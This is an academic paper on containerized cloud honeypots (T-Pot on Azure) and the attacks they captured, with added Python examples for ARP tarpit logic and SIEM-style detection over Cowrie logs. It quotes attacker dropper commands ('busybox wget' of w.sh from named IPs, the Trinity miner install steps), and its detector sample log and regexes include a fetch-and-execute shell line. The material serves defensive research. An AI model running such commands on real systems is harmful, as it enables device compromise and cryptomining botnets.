
  • Open access
  • Published: 25 January 2023

Containerized cloud-based honeypot deception for tracking attackers

  • V. S. Devi Priya
  • S. Sibi Chakkaravarthy

Scientific Reports, volume 13, Article number: 1437 (2023)


  • Engineering
  • Mathematics and computing

Discovering malicious packets amid a cloud of normal activity, whether with an IDS or by gathering and analyzing machine and device log files on company infrastructure, can be challenging and time consuming. The vulnerability landscape is rapidly evolving, and it will only get worse as more and more emerging technologies, such as IoT, industrial automation, CPS, and digital twins, are digitally connected. A honey trap makes identifying malicious packets easy after a few rapid calibrations to eliminate false positives. Besides analyzing and reporting particular intrusion patterns or the toolkits exploited, it also helps prevent access to real devices by simulating the genuine systems and applications operating in the network, thereby delaying as well as baffling the intruder. In order to analyze and evaluate attackers' behavior, an ensemble of research honeypot detectors has been deployed in our work. This paper delivers a robust outline of the deployment of containerized honeypots, which, as a direct consequence, are portable, durable, and simple to deploy and administer. The instrumented approach was monitored and generated countless data points from which significant judgments about the malevolent users' activities and purpose could be inferred.


Introduction

As we navigate this new digital revolution of massive heterogeneous data, difficult cyber security challenges crop up every day. It is no surprise that cyber security issues are at their peak, with many more to come. It is a significant concern that cyber-attacks are evolving in every way imaginable in order to keep pace with technological advancements. Phishing, crypto trojans, and cyber scamming are common yet threatening attacks that actively pursue and exploit users' confidential information. A cloud-managed wireless network solution lowers costs, raises productivity, and improves network security [1]. Internet and network fraudsters constantly attempt to compromise the security infrastructure of enterprises in order to grab sensitive information [2], so staying digitally secure becomes extremely challenging. The average cost of a data breach grew by 2.6 percent, from 4.24 million USD in 2021 to 4.35 million USD in 2022 [3]; compared with USD 3.86 million in the 2020 report, the average cost has increased by 12.7%. Furthermore, uncovering a cyberattack takes a lot of time, and attackers may be exploiting the system during this period while we remain fully unaware of it. By 2025, the global cost of cybercrime is expected to reach 10.5 trillion dollars per year, and spending on digital security will surpass 1.75 trillion dollars [4]. This creates a need to investigate cyber security risks in order to control the threat they pose effectively. Intruders skilfully reap the benefits of exploitable vulnerabilities in a variety of ways that are generally difficult to pinpoint because of rapid technological change. Therefore, it is important to identify current shortcomings, how adversaries can use them in the manufacturing environment, and, most crucially, the facts they are most keen on [5].

The best way to understand how to defend something is to be aware of what is going on within it, which argues for security observability. To fully understand what is happening inside an API/microservices system and defend it from attack, observability has to be employed [6]. Systems can be observed through logs, statistics, and distributed traces, giving a chance to spot intrusion attempts, fix security flaws, and prevent attacks before they do significant harm. Honeypots address many of these concerns.

A honeypot offers information security teams broader visibility and empowers them to guard against attacks that even the firewall cannot prevent. Many organizations worldwide have incorporated them as an added layer of security against internal and external threats. A cyber honey trap lures intruders with bait: it is a computer system set up expressly to be attacked, a decoy designed to attract cyber attacks [2, 7, 8]. It imitates real phishing targets and leverages infiltration tactics to obtain intelligence about fraudsters and their methods of operation, or to divert them from other objectives. Honeypots may also expose port numbers that appear open to a penetration test, which is a method for determining whether ports on a node are vulnerable. An open port may lure the intruder, enabling the analyst to examine their attack pattern. Honeypot systems are exceptionally good at information collection, and they may also include signature-based intrusion detection, traffic capture, and internet protocol assessment, as well as flexible screening and fine-tuning. Honeypotting differs from other security techniques in that it is not aimed at preventing intrusions directly. Its objective is to improve a firm's intrusion detection mechanism and incident response so that attacks can be handled and mitigated effectively. Anomalous and malicious traffic must be recognized so that security personnel can analyze and restrict undesirable traffic flows in the communication network. Researchers have presented several machine-learning (ML) models that categorize harmful traffic flows using appropriate feature selection techniques [9, 10, 11] in order to avoid fraudulent traffic flows in the network.

The significance of our experimentation:

  • We meticulously reviewed and evaluated the entire collection of information accumulated from the honeypot, while clearly demonstrating how to interpret it.
  • Along with indicating the major motivations for launching attacks and the alternatives available, we provide a thorough rationale for distinguishing botnet attacks.
  • We successfully implemented a flexible, multi-honeypot decoy system that provided a significant amount of information while retaining our prime goal, namely to create an early-warning entity.

The manuscript is organized as follows: "Background" presents an outline of honeypot systems and of virtualization and containerization, and states the novelty of our experimentation; "Conceptual models of allied frameworks" sketches the conceptual models of allied security analysis frameworks; "Experimental setup" describes the experimental setup and its implementation details; "Analysis of the captured data" details the analysis of the captured data. Finally, the paper concludes in "Conclusion and future enhancements".

Honeypot systems

Honeypots have the virtue of being targetable and hence facilitate the investigation of security vulnerabilities or the simulation of countermeasures against them [12]. Attacks on honeypots are not regarded as a hazard, as they usually contain no vital or genuine information. Rather than acting as a standalone security mechanism like an intrusion detection system, an intrusion prevention system, or a firewall, honeypots are regarded as a component of surveillance systems, and the type of security mechanism required determines how they are positioned.

Figure 1: Categorization of honeypot systems.

Based on their purpose (Fig. 1), honeypots can be categorized as production honeypots and research honeypots [13, 14]. Production honeypots are designed to detect intrusions in the intranet while also deceiving the malicious party. They run alongside real-world production workstations and provide the same functionality. They are commonly positioned close to surveillance assets in order to act as Indicators of Compromise (IoC) for both on-premise and external threats. Research honeypots gather information about intrusions, concentrating not only on how adversaries behave inside one's own network but also on the broader population. Analyzing information and intelligence from honeypots can assist officials in developing robust defensive systems and determining which upgrades to activate. They are frequently positioned in a network's Demilitarized Zone (DMZ) or in a location where no operational activities occur (for example, via VLAN segmentation).

Honeypots are also categorized according to their degree of interactivity, which determines how an attacker performs an intrusion on them:

  • High-interaction honeypot: Although not intended to replicate an entire production unit, they perform (or pretend to perform) most of the operations a production process would, such as running a complete operating system. The deploying entity can observe adversary habits and strategies using this sort of honeypot.
  • Mid-interaction honeypot: These do not have their own OS, but they mimic features of the application layer protocol stack. They try to hinder or baffle adversaries so that enterprises get more time to work out how to respond to an invasion.
  • Low-interaction honeypot: These use fewer resources and collect only fundamental information on the type of risk or where it originated. They use TCP/IP (Transmission Control Protocol/Internet Protocol) and internet services and are reasonably straightforward to configure. There is, however, hardly anything within the honeypot that will keep the assailant's focus for an extended period (e.g. Honeyd [15]).
  • Pure honeypot: These are large-scale, production-like systems that run across multiple servers. They are packed with sensors and hold "sensitive" information.

Depending on the functional area, honeypots can be categorized as:

  • Malware honeypots: Identify malware by using established replication and exploitation channels (e.g. Ghost [16]).
  • Spam honeypots: Unsecured proxies and email gateways are used in spam honeypots to entice fraudsters. Spam traps can detect a spammer's attempt and afterwards prohibit them from sending spam.
  • Database honeypots: Create deception databases to entice database-specific exploits such as SQL injection attacks, which manipulate data in an unauthorized manner.
  • Honeynets: Comprised of multiple honeypots. Various assaults, such as DDoS (Distributed Denial-of-Service) attacks, assaults on CDNs (Content Delivery Networks), and advanced persistent threats, can be examined by integrating various types of honeypots.

Depending on their intended application, honeypots can be planted both locally and externally. They are commonly installed in a demilitarized zone [17] (DMZ; sometimes referred to as a "perimeter network" or "screened subnet") on the network. A DMZ is a physical or logical subnetwork that exposes a corporation's external-facing services to an unsecured, typically bigger network, namely the World Wide Web. To track attempts to access the internal network, honeypots can be placed outside the external firewall and pointed at the internet. They can also be installed alongside the servers of a business network. The honeypot's exact position depends on its level of complexity, the type of traffic it hopes to draw, and how close it is to critical enterprise network assets. Regardless of where it is located, it is always substantially isolated from the production environment. The three crucial areas of an organization in which placement is optimal are demonstrated in Fig. 2 [18].

Figure 2: Honeypot system placement in an organizational network.

The major objectives of deploying a honeypot can be enumerated as:

  • To learn more about improbable threats and weaknesses.
  • To serve as a predefined capture mechanism that draws assailants' interest.
  • To uncover fraudulent network activity.
  • To defend actual systems by concealing them, so that any attempt hits the honeypots instead.
  • To identify novel approaches and techniques (such as zero-day attacks).

Compared with honeypots, firewalls are typically established at an organization's perimeter to prevent unwanted access by screening specific ports and content; however, they are not very effective at analyzing the traffic. An IDS or vulnerability detection system analyzes the communications and finds any improper, illegal, or unusual activities. But IDSs often suffer from the 'false warning issue': signature-based IDSs frequently produce false-negative warnings, whereas anomaly-based IDSs generate false-positive alerts [19]. Integrating IDSs with a honeypot can greatly diminish faulty alerts.

Virtualization and containerization

Most conventional methods for using honeypots become quite unproductive as engineers and technology professionals integrate containerization and microservices into their solutions. Containerization provides operating-system-level virtualization [20]. The program and its prerequisites are packaged together in a container, which is a secluded virtual arena. As they share the host operating system and its relevant components, containers offer a lightweight solution compared with virtual machines. Microservices deploy concise single-purpose modules using containerization, which together result in more flexible, extensible programs. This strategy eliminates the requirement to develop and release a completely new version on each modification or scaling of a particular function [21, 22].

Novelty of our experimentation

Existing research [23] on containerized honeypot data analysis has mostly focused on information pertaining to Industrial Control System (ICS) devices and is insufficient to analyze all of the data that has been collected. As that honeypot was deployed in the cloud, hackers could readily identify it as a decoy system. Hence, we strongly believe that the findings obtained were the consequence of bots scanning the cloud and are therefore insufficient to improve the security intelligence of ICS systems, as asserted by [23].

Our work distinctly demonstrates how to interpret data by critically analyzing and evaluating the whole body of evidence collected from our honeypot experimentation. We also furnish a detailed justification for identifying prevalent DDoS attacks while speculating on potential causes and alternatives. We thus conclude that the virtue of absolute security can be accomplished by integrating honeypot data with an IDS/IPS system. Moreover, the contributions asserted in this review further help to reopen areas of investigation in smart security intelligence.

Conceptual models of allied frameworks

Since the year 2000, there have been numerous distinct honeypot implementations, both open source and commercial. While some of them provide various services and emulations, others were built with a specific objective, such as protecting against a particular attack. Numerous authors have worked to compile lists of honeypots.

An open and automated relay spamming research honeypot with an Intellectual Simulated Analyzer (SpamPot) [24] utilizes Elasticsearch or OpenSearch to store data filtered from received spam. It is comprised of two parts: the analyzer and the receiver. The receiver is an SMTP server that accepts all emails sent its way. Each email is dumped in a directory together with its associated metadata, such as the IP address of the sender, the addresses of the recipients, etc. The analyzer continuously watches this directory in order to analyze these messages: it retrieves spam from the receiver-shared directory and parses the .eml and metadata documents, extracting information such as URLs, attachments, and the mail body. If third-party extensions like VirusTotal, Hatching Triage, etc. are set up with API keys, the indicators retrieved from the email can then be queried through those services. Elasticsearch then indexes the extracted data for subsequent searching and analysis. SMTP verification and VirusTotal lookup still need to be integrated.

A project called LaBrea [25] creates a tarpit (or sticky honeypot) that establishes "virtual computers" which respond to connection requests by taking control of unoccupied IPv4 addresses on a local area network. The program assumes that the IP in question is unused when it observes multiple successive ARP queries for it, spaced many clock cycles apart, with no intervening ARP response. It then "produces" an ARP response with a fake MAC address and transmits it to the requester. Valicek et al. [26] propose the use of a Windows high-interaction honeypot targeted for deployment in an office setting. The authors' goal was seamless integration of the project into a production environment.
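The unused-address inference described for LaBrea, worked as an added Python example (not LaBrea's own code): a passively observed ARP trace is replayed, an address that draws several spaced-out requests with no reply is marked unclaimed, and the tarpit's bogus ARP reply for it is built as a plain dict. The thresholds, the fake MAC value and the sample ARP events are constructed for illustration.

```python
"""Added example: LaBrea-style detection of unclaimed IPv4 addresses from
passively observed ARP traffic. Not LaBrea's own code; thresholds, the fake
MAC and the sample events below are constructed for illustration."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpEvent:
    ts: float        # observation time in seconds
    op: str          # "request" (who-has target_ip?) or "reply" (target_ip is-at ...)
    target_ip: str   # the address being asked about / claimed


def find_unclaimed_ips(events, min_requests=3, min_spacing=1.0):
    """Return the set of addresses that look unused.

    Rule (as the paper describes LaBrea): at least `min_requests` ARP requests
    for the same address, each at least `min_spacing` seconds after the last
    counted one, with no ARP reply for that address since the first request.
    A reply resets the count, because a reply proves the address is in use.
    Requests inside one tight burst (retransmissions) count only once.
    """
    counted = defaultdict(list)  # ip -> timestamps of counted requests since last reply
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.op == "reply":
            counted[ev.target_ip] = []          # someone answered: address is live
        elif ev.op == "request":
            seen = counted[ev.target_ip]
            if not seen or ev.ts - seen[-1] >= min_spacing:
                seen.append(ev.ts)
        else:
            raise ValueError(f"unknown ARP op {ev.op!r}")
    return {ip for ip, stamps in counted.items() if len(stamps) >= min_requests}


def tarpit_arp_reply(requested_ip, fake_mac="02:00:00:00:00:01"):
    """Build the bogus 'is-at' reply a tarpit would send for an unclaimed
    address. The MAC is a constructed locally-administered value, not LaBrea's."""
    return {"op": "reply", "sender_ip": requested_ip, "sender_mac": fake_mac}


def tarpit_decisions(events, **thresholds):
    """Run detection over an ARP trace and return the replies the tarpit would
    emit, one per unclaimed address, sorted for determinism."""
    return [tarpit_arp_reply(ip) for ip in sorted(find_unclaimed_ips(events, **thresholds))]


# Constructed ARP trace: 10.0.0.5 is live, later goes quiet; 10.0.0.9 is never
# answered; 10.0.0.7 is only asked about in one retransmission burst.
SAMPLE_EVENTS = [
    ArpEvent(0.0, "request", "10.0.0.5"),
    ArpEvent(0.5, "reply", "10.0.0.5"),
    ArpEvent(1.0, "request", "10.0.0.9"),
    ArpEvent(2.5, "request", "10.0.0.9"),
    ArpEvent(4.0, "request", "10.0.0.9"),
    ArpEvent(5.0, "request", "10.0.0.7"),
    ArpEvent(5.1, "request", "10.0.0.7"),
    ArpEvent(5.2, "request", "10.0.0.7"),
    ArpEvent(20.0, "request", "10.0.0.5"),
    ArpEvent(21.5, "request", "10.0.0.5"),
    ArpEvent(23.0, "request", "10.0.0.5"),
]

if __name__ == "__main__":
    for reply in tarpit_decisions(SAMPLE_EVENTS):
        print(reply)
```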

In order to assess the present threat environment and how intelligent and crafty bad actors may be in compromising internet-facing ICS (Industrial Control System) devices, Rashid et al. [23] implemented a flexible low-interaction honeypot in AWS EC2 cloud instances across six distinct zones. Their research focuses primarily on honeypot data relevant to ICS systems and compares the top 10 AS/ASN attackers, interactions with various ICS devices and their geolocation, brute force attack rates, CVE and signature alerts, IP reputation, authentication events, various post-exploitation actions along with sample instructions, malware signatures, and interactions from different sources. Because it was installed in the cloud, hackers could easily identify the honeypot as a decoy. As a result, the information collected is suspected to have been produced by automated bots scanning the cloud, and is therefore insufficient to add to the security intelligence of ICS systems. Methods that reduce the likelihood of a honeypot being discovered are described in [27, 28, 29, 30].

Experimental setup

Our experimentation is based on the work undertaken by DTAG (Deutsche Telekom) [31], which uses an ensemble of Docker containers along with an ELK stack for honeypot administration and data analysis respectively. It uses Docker as well as docker-compose to run a large number of tools concurrently and fully leverage the hardware of the host. After successful implementation on a local device, the approach was migrated to the cloud. This makes the overall mechanism relatively low maintenance, as it enabled us to operate several honeypot sensors without hassle on the same connection interface. Good segregation of the sandboxes and simple update procedures are enabled by the Docker encapsulation of the honeypot daemons.

The setup is carefully and consciously made to look like a valid target, mirroring the modeling approach of its components, structure, and content. This is done to persuade the opponent that they have gained access to the real system and to tempt them to stay. Inbound traffic has been configured to accept all traffic. All persistent data files from the ensemble of honeypots can be found in the folder /data. Data logs related to each honeypot can be found at /var/lib/docker/containers/*/*.log. Filebeat serves as the logging agent or log data shipper: a lightweight shipper that is installed on the system, collects the system logs, tails them, and transmits the information to Logstash for more sophisticated processing. Filebeat starts one or more inputs that search for log data in the designated folder and launches a harvester for each log it discovers [32]. Whenever a harvester reads fresh data from a single log, it transmits the new log data to libbeat, which aggregates the events and delivers the aggregated data to the output that is set up for Filebeat. It was written in Go and has been optimized to handle massive amounts of data, support cryptography, and effectively withstand backpressure. Logstash, a free data engine written in Ruby, is used to ingest and process data from multiple sources and emit it through its output plug-in to Elasticsearch. All log content is patched up, transformed, and given advanced downstream visualization and analytical depth [33]. The three stages of the Logstash event processing pipeline are inputs, filters, and outputs. Events are produced by inputs (beats/file/syslog/redis), modified by filters (grok/mutate/drop/clone/geoip), and sent onward by outputs (elasticsearch/file). Both inputs and outputs accept codecs, letting you encode or decode data as it moves through the pipeline without the need for an additional filter. Regardless of format or complexity, it dynamically prepares relevant information, such as creating patterns from unstructured data, interpreting geographical information from IP addresses, and removing or anonymizing sensitive fields in personally identifiable data, regardless of the source, structure, or schema, simplifying overall processing.

Elasticsearch, a modern search and analytics engine, is a Java-based NoSQL database built on Apache Lucene [34]. With Elasticsearch, organizations can retain, explore, and analyze massive amounts of data quickly and in near real time, with results arriving in fractions of a second. It examines an index rather than the text itself, which enables it to deliver quick search results. Instead of records and databases, it employs a document-based model and has robust REST APIs (Representational State Transfer Application Programming Interfaces [35]) for maintaining and accessing the data. Elasticsearch can be thought of as a server that responds to JSON requests with JSON data. Elasticsearch data is visualized and explored using the free and open-source Kibana interface. For instance, because Kibana is frequently used for log analysis, it is used to find information about dissemination URLs, the sources of web hits, etc. Visualization can start with one query and be refined interactively as required. A significant constraint, however, is that each visualization can only be used with a specific index or index pattern. If one index holds data completely different from another, distinct visual representations for each index must be created. Figure 3 depicts an overview of the experimental workflow.

Figure 3: Collaborative operational testbed for real-time implementation using Docker containerized honeypots.

Overview of deployed honeypots

The system implementation provides the following images for various Docker honeypots. Cowrie [36, 37, 38] is a medium- to high-interaction SSH and Telnet honeypot and the successor of the Kippo honeypot. It is written in Python and includes a flexible fake file system and a fake shell. Additionally, it is able to copy files via SFTP (SSH File Transfer Protocol) for subsequent analysis. In high-interaction (proxy) mode, it functions as an SSH and Telnet proxy to track the attacker's actions on another system. In medium-interaction (shell) mode, it emulates a UNIX system in Python. In the most recent version, Cowrie adds TCP/IP tunneling to capture proxy requests and the associated data. Every interaction is recorded in JSON format, and every session is archived.

For the purpose of tracking and observing multicast (UDP) Distributed Denial of Service (DDoS) attacks, the DDoSPot honeypot is deployed. It is a UDP-based platform that acts as a booby trap to monitor and track DDoS attacks. The following facilities, or honeypot servers, are supported by the system in the form of straightforward plugins referred to as pots: a DNS (Domain Name System) server, an NTP (Network Time Protocol) server, an SSDP (Simple Service Discovery Protocol) server, a CHARGEN (Character Generator) server (port 19), and a random or mock UDP server. Ports 19, 123, 1900, and 53 are advertised as being used for communication.

Dionaea is a low-interaction honeypot [38, 39, 40] that simulates and offers a wide range of protocols, including FTP (File Transfer Protocol), TFTP (Trivial FTP), HTTP (Hyper Text Transfer Protocol), HTTPS (HTTP Secure), MQTT (MQ Telemetry Transport), MSSQL (Microsoft SQL), MySQL, SIP (Session Initiation Protocol), SMB (Server Message Block), and UPnP (Universal Plug & Play). Dionaea uses the libemu library for x86 emulation to collect suspicious activity. Heralding is a low-interaction honeypot [38, 41] that mimics a number of access interfaces in order to record entered credentials and source or destination ports. It offers a set of protocols, including Telnet, SSH (Secure Shell), FTP, HTTP, POP (Post Office Protocol), SMTP (Simple Mail Transfer Protocol), etc.

ADBHoney is a low-interaction honeypot for the TCP/IP ADB (Android Debug Bridge) protocol [42]. The Android Debug Bridge (ADB) protocol manages actual and emulated phones, televisions, and DVRs linked to a specific host. It includes a number of commands (such as adb shell, adb push, etc.) that help developers push information to the device while troubleshooting.

TANNER, a remote data analysis and classification service, is used to analyze web application requests and provide the replies that are then served by SNARE. When offering replies for SNARE (a web application honeypot that draws all kinds of internet coercion), TANNER employs a variety of application vulnerability type emulation strategies. Additionally, TANNER gives dorks to SNARE so that it can power its luring skills. Redis honeypot is a high-interaction honeypot that traps Redis vulnerabilities. Redis (Remote Dictionary Server) is an in-memory key-value data store that persists on disk. All Redis data resides in memory, enabling high throughput and low latency [43].

Log4j honeypot is an internal-network low-interaction honeypot that helps spot internal threats or intruders who search the network for Log4j. It merely keeps an eye out for suspicious text patterns in requests (in input fields or HTTP headers) and sends notifications if anything odd shows up. Mailoney is a low-interaction SMTP honeypot that can simulate several modes, such as open_relay (logs every attempt to deliver an email), postfix_creds (logs credentials of login attempts), and schizo_open_relay (logs every activity).

Honeytrap [44] serves as a trap for all communication in the setup that has not been caught by another honeypot. It keeps track of arriving frames and launches TCP and UDP listeners so that information can be captured. Ciscoasa, a low-interaction honeypot for Cisco ASA (the Cisco Adaptive Security Appliance), which can detect the DoS (Denial of Service) and remote code execution flaw known as CVE-2018-0101 (a flaw in the SSL (Secure Socket Layer) VPN capabilities of the Cisco ASA software that allows unauthenticated remote attackers to force a system restart or remotely perform operations), has also been employed.

CitrixHoneypot identifies and records activity of the CVE-2019-19781 exploit (CVE-2019-19781: Citrix Application Delivery Controller, previously known as NetScaler ADC, and Citrix Gateway, also known as NetScaler Gateway, were found to include a vulnerability that, if abused, might allow an unauthorized attacker to execute malicious scripts). The honeypot Glutton allows for the collection, recording, and analysis of forwarded traffic by serving as a gateway between an adversary and another honeypot. In general, it listens on every port and then operates in accordance with the rules in the rules.yaml file (found in /root/tpotce/docker/glutton/dist/rules.yaml). The predominant library used by the proxy to handle packets and carry out its functions is Freki, which orchestrates packets in userspace via NFQueue, a target of iptables and ip6tables that hands off the action on packets to a user-mode application.

Elasticsearch, Kibana, and Logstash, which are all elements of the ELK Stack [45, 46], were used to analyze and visualize the honeypot data. Built on top of Apache Lucene, Elasticsearch is released under the Apache license. Its distributed search engine employs the REST (REpresentational State Transfer) architectural style. Kibana is an analytics program that uses Elasticsearch, data visualization, and input from other Elastic Stack elements. Logstash is used as an information-gathering backend to make it simple and quick to integrate log file storage and retrieval. The honeypots expose a combination of well-known and uncommon ports. These include ports 80 and 443 (HTTP/HTTPS), port 21 (FTP), port 22 (SSH), and port 445 (SMB and Microsoft Active Directory). Port 64297 was used to give authenticated access to the dashboard of the overall system, and port 64295 for SSH access.

As decision-making tools for forensics and network surveillance, the honeypot cluster employs FATT (Fingerprint All The Things: built on pyshark, it allows the extraction of network metadata and trace evidence from live traffic or captured pcap files. The profiling techniques it integrates, such as JA3 (TLS client or server fingerprinting), HASSH (SSH client or server fingerprinting), and RDFP (RDP fingerprinting), help run threat intelligence techniques inside a communication network), p0f (Passive Operating System Fingerprinting: uncovers the entities behind any TCP/IP interaction (even a plain SYN message) by purely passive flow fingerprinting, without intervening in any form), and Suricata. The folders /OPT/container_name/LOG and /OPT/container_name/DL of the container hold the logs and the files uploaded to the honeypot. These paths are mapped to the host machine volumes /DATA/container_name/LOG. Additionally, certain facilities offer the tools Cockpit, CyberChef, Elasticsearch Head, SpiderFoot, and Suricata, which further aid in the management, tracking, and assessment of honeypot systems as well as the dissemination of findings to the public.

Implementation

The honeypots were set up on Microsoft Azure Cloud in different regions, which helps in analyzing the demographics of attack vectors in diverse locations (region 1: Central India, region 2: East Japan). For the entire experiment, each instance ran Debian 11 (bullseye-Gen1 image, VM instance type E2ds_v4) and had two virtual CPUs, 16 gigabytes of memory, a 128 gigabyte hard disk, and a static IP address. The containers in the system operate in host-network mode, which shares the host system's network stack, so no separate IP address is assigned. In total, the system was operational 24 hours a day for 10 days, from 27th June 2022 to 6th July 2022. In order to minimize discrepancies brought on by week-to-week variations in the attack surface, each instance began and concluded in a synchronized manner. To expose the system to exploitation, all ports were left open for incoming traffic. This experimentation offers further useful information that will help cyber security move forward. We installed the honeypot on the cloud using the T-Pot installer. After installation it prompts to create a password for the user tsec and/or to create a <web-username> and password that will be used for subsequent access. Furthermore, if the tpot.conf file in the tpotce/iso/installer directory is customized, the installer can run automatically.

Analysis of the captured data

After setting up the cloud honeypot instances in the two regions, the front-end interface is reached at https://<external IP address>:64297, and the credentials created during setup are used to log in. Figure 4 shows the overall attacks received in both regions. Attacks began arriving as soon as the IP addresses became reachable from the internet. Knowing that assaults start practically immediately after an IP address is exposed makes it obvious that bots and scanners constantly sweep the cloud providers' IP ranges; this emphasises how crucial it is to protect assets before they are made reachable for operations. The attack statistics obtained in our experiment are sketched in Fig. 4.

Figure 4. Attack statistics for the honeypot instances in the two experimental cloud regions.

Analysis of DDoS strikes

We took a deeper look at the Ddospot honeypot, as it reported the highest number of hits at both instances. A variety of automated tools and DDoS-as-a-service offerings from third parties make it simple to launch DDoS attacks 47, 48; even a beginner can initiate a sophisticated DDoS assault by renting the elastic capacity of cloud platforms.

Figure 5. Sample commands executed by the adversaries upon accessing the system.

Not every attack originates from an unidentified source at an unidentified IP address. If a user runs any of the commands listed here, most SIEMs (Security Information and Event Management systems) can be configured to raise an alert, and policies can be set to freeze the account until it is confirmed that no breach occurred. Building a defence requires understanding what adversaries do once they have gained access. Figure 5 lists the commands most frequently used by the malicious users and Table 1 details them.

Analysing the captured data and using it as a reference point for the auditing process helps enterprises understand their existing security posture. The Ddospot honeypot tagged sources as known attacker, malware, Tor exit node, Bitcoin node, form spammer, mass scanner, anonymiser, bot and crawler; of all attacks received, 71% came from known attackers already listed for malicious activity. We could pin down abuse of the BusyBox wget applet and a Trinity P2P malware attack (Fig. 6). Attackers often prefer to download an intermediary script that in turn fetches the malware rather than download the payload directly; here they used "busybox wget" (the download applet commonly present on embedded Linux devices) to fetch the shell script w.sh from the IPs 31.7.58.162 and 163.123.142.144, both of which are blacklisted according to 49.

Figure 6. Commands executed by the adversaries after access, launching the BusyBox download and Trinity botnet attacks.

As Fig. 6 shows, once a device has been compromised by the Trinity malware it is set up to scan the network for other exploitable devices with port 5555 (Android Debug Bridge) open 50. A shell is opened and the command "pm path com.ufo.miner" checks whether the miner package is already installed. If it is not, an APK containing the malicious program is pushed to the device, installed, and the installer is deleted. After installation, "am start -n com.ufo.miner/com.example.test.MainActivity" launches the UFO miner. "ps | grep trinity" checks whether the Trinity bot is already running; if not, the "trinity", "nohup" and "script" files are installed and the "tmp" directory is cleared. Using chmod, the permissions on the nohup and trinity files are set so that everyone has read and execute permission and the owner additionally has write permission. The consequence of the Trinity botnet attack is that infected machines join the botnet, which keeps mining cryptocurrency for the attacker.
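
The detection rule the two preceding paragraphs call for (alert when a session runs the fetch-then-execute or the Trinity/ADB command sequence) can be expressed directly over the honeypot's command log. The following is an added example, not code from the paper or from T-Pot: it assumes command events in the shape of Cowrie's JSON log (eventid "cowrie.command.input", with "session", "src_ip" and "input" fields) and that ADB command lines have been normalised into the same shape. The log lines, addresses and session IDs are constructed for illustration; the stage names, regexes and verdict thresholds are the example's own choices, not anything the paper specifies.

```python
import json
import re

# Constructed log lines in the shape of Cowrie's JSON event log ("cowrie.command.input");
# they are illustrative, not captured data. The ADB commands follow the Trinity sequence
# described in the text, normalised into the same record shape.
SAMPLE_LOG = r"""
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.7","timestamp":"2022-06-28T01:02:03Z","input":"cd /tmp || cd /var/run; busybox wget http://198.51.100.250/w.sh -O w.sh; chmod 777 w.sh; sh w.sh; rm -rf w.sh"}
{"eventid":"cowrie.command.input","session":"a2","src_ip":"203.0.113.9","timestamp":"2022-06-28T02:00:00Z","input":"pm path com.ufo.miner"}
{"eventid":"cowrie.command.input","session":"a2","src_ip":"203.0.113.9","timestamp":"2022-06-28T02:00:01Z","input":"pm install /sdcard/trinity.apk"}
{"eventid":"cowrie.command.input","session":"a2","src_ip":"203.0.113.9","timestamp":"2022-06-28T02:00:02Z","input":"am start -n com.ufo.miner/com.example.test.MainActivity"}
{"eventid":"cowrie.command.input","session":"a2","src_ip":"203.0.113.9","timestamp":"2022-06-28T02:00:03Z","input":"ps | grep trinity"}
{"eventid":"cowrie.command.input","session":"a2","src_ip":"203.0.113.9","timestamp":"2022-06-28T02:00:04Z","input":"chmod 755 /data/local/tmp/nohup /data/local/tmp/trinity; nohup /data/local/tmp/trinity >/dev/null 2>&1 &"}
{"eventid":"cowrie.session.connect","session":"a3","src_ip":"192.0.2.4","timestamp":"2022-06-28T03:00:00Z"}
{"eventid":"cowrie.command.input","session":"a3","src_ip":"192.0.2.4","timestamp":"2022-06-28T03:00:01Z","input":"uname -a"}
"""

# Stages of the post-access sequence, in the order an infection usually proceeds.
STAGE_PATTERNS = [
    ("download",           re.compile(r"\b(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b")),
    ("make_executable",    re.compile(r"\bchmod\s+(?:[ugoa]*\+[rwx]*x[rwx]*|[0-7]{3,4})\b")),
    ("execute_script",     re.compile(r"\b(?:sh|bash)\s+\S+\.sh\b|(?:^|[;&|\s])\./\S+")),
    ("miner_probe",        re.compile(r"\bpm\s+path\s+com\.ufo\.miner\b")),
    ("apk_install",        re.compile(r"\bpm\s+install\b")),
    ("miner_start",        re.compile(r"\bam\s+start\s+-n\s+com\.ufo\.miner/")),
    ("bot_check",          re.compile(r"\bps\b[^;]*\|\s*grep\s+trinity\b")),
    ("background_persist", re.compile(r"\bnohup\b")),
    ("cleanup",            re.compile(r"\brm\s+-[a-z]*r[a-z]*\s")),
]
ADB_CHAIN = {"miner_probe", "apk_install", "miner_start", "bot_check"}


def classify(command):
    """Return the stage names a single command line matches, in STAGE_PATTERNS order."""
    return [name for name, pat in STAGE_PATTERNS if pat.search(command)]


def verdict(stages):
    """Collapse the stages seen in one session into an alert category."""
    seen = set(stages)
    if len(ADB_CHAIN & seen) >= 2:            # two or more steps of the Trinity/ADB sequence
        return "trinity_adb_chain"
    if "download" in seen and seen & {"make_executable", "execute_script"}:
        return "dropper"                      # fetch-then-run is the classic IoT dropper pattern
    if seen:
        return "suspicious"
    return "recon"                            # commands seen, but none of the tracked stages


def analyze(log_text):
    """Group command events by session and attach the stages and a verdict to each session."""
    sessions = {}
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        if event.get("eventid") != "cowrie.command.input":
            continue                          # logins, file downloads etc. are out of scope here
        sess = sessions.setdefault(event["session"],
                                   {"src_ip": event["src_ip"], "commands": 0, "stages": []})
        sess["commands"] += 1
        for stage in classify(event["input"]):
            if stage not in sess["stages"]:   # keep first-seen order, no duplicates
                sess["stages"].append(stage)
    for sess in sessions.values():
        sess["verdict"] = verdict(sess["stages"])
    return sessions


def siem_alerts(sessions):
    """Render the sessions worth a SIEM alert, one line each (recon-only sessions are skipped)."""
    return [f"{sid} {s['src_ip']} {s['verdict']} stages={','.join(s['stages'])}"
            for sid, s in sorted(sessions.items()) if s["verdict"] != "recon"]


if __name__ == "__main__":
    for alert in siem_alerts(analyze(SAMPLE_LOG)):
        print(alert)
```

The verdict is computed per session rather than per command on purpose: a lone chmod or rm is noise, whereas download followed by execution, or two steps of the miner installation, is the behaviour the text describes and the thing worth freezing an account over.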

Figure 7. Unique source IP count by the Ddospot honeypot.

The number of distinct source IP addresses can serve as a DDoS detection feature: one tracks fluctuations in the count of distinct source IPs over an observation window, together with the number of source IPs whose transmitted data exceeds a specified threshold 51. Both the count of distinct source IPs and the count of non-complying source IPs can be assessed in each observation window (Fig. 7) to look for attacks. Under normal conditions both deviate little from their mean values; during an attack the deviation becomes pronounced.
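
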